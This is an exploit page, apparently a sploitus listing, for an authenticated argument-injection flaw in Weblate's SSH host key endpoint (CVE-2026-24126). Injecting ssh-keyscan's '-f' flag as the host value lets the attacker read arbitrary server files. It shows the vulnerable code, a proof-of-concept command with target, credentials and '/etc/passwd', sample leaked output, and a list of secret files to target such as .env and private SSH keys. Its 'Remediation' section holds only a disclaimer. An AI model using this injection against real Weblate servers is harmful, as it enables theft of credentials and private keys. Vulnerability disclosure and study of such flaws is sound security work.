Share
## https://sploitus.com/exploit?id=1B574235-B6FE-58D2-9880-010AF4F8F5DE
# Weblate -- Arbitrary File Read via SSH Host Argument Injection

> **Discovered by:** Alejandro Baño · **~January 2026**

---

## Overview

Weblate's SSH host key management endpoint passes the `host` parameter supplied by an authenticated administrator **directly to `ssh-keyscan`** without any sanitization or argument validation. Because `ssh-keyscan` accepts a `-f ` flag to read target hostnames from a file, an attacker with admin credentials can inject that flag as the host value and force the server to open an arbitrary local file. The resulting error output (or stdout) is reflected verbatim back to the browser inside an error message block, leaking the file's contents.

---

## Vulnerability Details

| Field | Value |
|---|---|
| **Target** | Weblate (self-hosted instances) |
| **Component** | SSH key management — `weblate/ssh/views.py` · `add_host_key()` |
| **Auth required** | Yes — Weblate administrator account |
| **Impact** | Arbitrary local file read as the web-server process user (`weblate`, `www-data` etc.) |
| **CVSS v3** | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L |
| **CVE** | CVE-2026-24126 |

---

## Root Cause

```python
# weblate/ssh/views.py  — simplified
def add_host_key(request, host, port=""):
    cmdline = ["ssh-keyscan"]
    if port:
        cmdline.extend(["-p", str(port)])
    cmdline.append(host)          # ← host is appended with no validation
    result = subprocess.run(cmdline, ...)
```

The `host` value comes directly from the POST body field `host` with no allowlist, no stripping of leading dashes, and no `--` argument terminator before the user-supplied value. This lets an attacker inject any `ssh-keyscan` flag.

`ssh-keyscan -f /etc/passwd` reads `/etc/passwd` as a list of hostnames, fails to resolve each line, and produces error output for every one. That error output propagates through the `CalledProcessError` handler and is displayed inside an `alert-danger` block in the HTTP response.

---

## Proof of Concept

```
python3 exploit.py -r https://target.example.com -u admin -p admin123 -f /etc/passwd
```

#### Options

| Flag | Description |
|---|---|
| `-r` / `--rhost` | Base URL of the Weblate instance |
| `-u` / `--username` | Admin username |
| `-p` / `--password` | Admin password |
| `-f` / `--file` | Path to the file to read on the server |

#### Example output

```
python3 CVE-2026-24126.py -r http://localhost -u admin -p 'ChangeThisToAStrongPassword' -f /etc/passwd

[+] Login successful for user: admin
[*] Sending payload to http://localhost/manage/ssh/, this could take some time, please be patient...

[+] Extracted file content:
--------------------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
weblate:x:1000:1000::/home/weblate:/bin/sh
--------------------------------------------------
[!] Exploit finished
```

---

## Impact

Any file readable by the OS user running Weblate (typically `weblate` user) can be exfiltrated through a single authenticated POST request. Sensitive targets include:

- Application secrets: `settings.py`, `.env`, `local_settings.py`
- Private SSH keys: `/var/lib/weblate/.ssh/id_rsa`
- Database credentials exposed in config files

---

## Remediation

This repository is intended for **educational and authorized security research only**. Do not use this tool against systems you do not own or have explicit written permission to test. The author assumes no liability for misuse.